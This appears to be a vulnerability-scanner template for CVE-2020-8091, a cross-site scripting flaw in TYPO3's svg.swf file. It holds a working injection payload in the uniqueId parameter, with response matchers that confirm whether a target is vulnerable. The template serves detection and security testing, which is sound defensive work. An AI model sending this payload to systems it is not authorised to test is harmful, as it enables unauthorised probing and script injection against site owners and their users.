id: CVE-2020-8091 info: name: TYPO3 Cross-Site Scripting Vulnerability author: dwisiswant0 severity: medium description: svg.swf in TYPO3 6.2.0 to 6.2.38 ELTS and 7.0.0 to 7.1.0 could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack on a targeted system. This may be at a contrib/websvg/svg.swf pathname. tags: cve,cve2020,xss reference: - https://typo3.org/security/advisory/typo3-psa-2019-003/ - https://www.purplemet.com/blog/typo3-xss-vulnerability requests: - method: GET path: - "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "31337" part: body - type: word words: - "application/x-shockwave-flash" part: header